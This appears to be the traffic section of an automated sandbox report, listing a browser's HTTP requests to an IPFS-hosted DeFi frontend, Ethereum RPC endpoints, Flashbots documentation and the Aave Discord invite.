Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/reserve-overview-9124a4eaac07e2b6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rpc.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: eth-mainnet.public.blastapi.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start/ HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /invite/aave HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/69646.560b06bc5c21054b4473.css HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /eth HTTP/1.1Host: rpc.ankr.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bd6b6b1c91dc1a52bd3d1aad82bd575d"
Source: global trafficHTTP traffic detected: GET /assets/webMinimal.9d2ce1b93ad02861f9cf.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/sentry.4aa65d81f09c738c28ce.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /application-services/products/web3/ HTTP/1.1Host: www.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=PgqFTlEBbGY_EfZJRhQU52zUW0xdvnX1xdT694RQlsI-1727496728-1.0.1.1-lJ7MRdoznbgUYWapQQJtW2l_HJI9rIgC53Ns4YHwKC1rzKeOqSOR6nauw41fznOhbpFHdxBIgMqOFTupXtpn0Vo7VHjiN8Oxn2jkaSL76Vg
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rpc.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start/ HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/sentry.4aa65d81f09c738c28ce.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: eth-mainnet.public.blastapi.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bd6b6b1c91dc1a52bd3d1aad82bd575d"
Source: global trafficHTTP traffic detected: GET /application-services/products/web3/ HTTP/1.1Host: www.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=PgqFTlEBbGY_EfZJRhQU52zUW0xdvnX1xdT694RQlsI-1727496728-1.0.1.1-lJ7MRdoznbgUYWapQQJtW2l_HJI9rIgC53Ns4YHwKC1rzKeOqSOR6nauw41fznOhbpFHdxBIgMqOFTupXtpn0Vo7VHjiN8Oxn2jkaSL76Vg
Source: global trafficHTTP traffic detected: GET /eth HTTP/1.1Host: rpc.ankr.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rpc.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start/ HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: eth-mainnet.public.blastapi.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bd6b6b1c91dc1a52bd3d1aad82bd575d"
Source: global trafficHTTP traffic detected: GET /eth HTTP/1.1Host: rpc.ankr.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /application-services/products/web3/ HTTP/1.1Host: www.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=PgqFTlEBbGY_EfZJRhQU52zUW0xdvnX1xdT694RQlsI-1727496728-1.0.1.1-lJ7MRdoznbgUYWapQQJtW2l_HJI9rIgC53Ns4YHwKC1rzKeOqSOR6nauw41fznOhbpFHdxBIgMqOFTupXtpn0Vo7VHjiN8Oxn2jkaSL76Vg
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rpc.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start/ HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: eth-mainnet.public.blastapi.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bd6b6b1c91dc1a52bd3d1aad82bd575d"
Source: global trafficHTTP traffic detected: GET /api/v9/experiments?with_guild_experiments=true HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjMzMTE0NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=X-Context-Properties: eyJsb2NhdGlvbiI6IkFjY2VwdCBJbnZpdGUgUGFnZSJ9X-Debug-Options: bugReporterEnabledsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Discord-Timezone: America/New_YorkX-Discord-Locale: en-USsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/webMinimal.9d2ce1b93ad02861f9cf.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/version.stable.json?_=5758322 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/24a0aa8d37ef3037705f.css HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/2917679ca8a08c390036.css HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/8234e0a75aa9afb205bd.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.560b06bc5c21054b4473.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/b21c5111a12372139409.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.560b06bc5c21054b4473.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
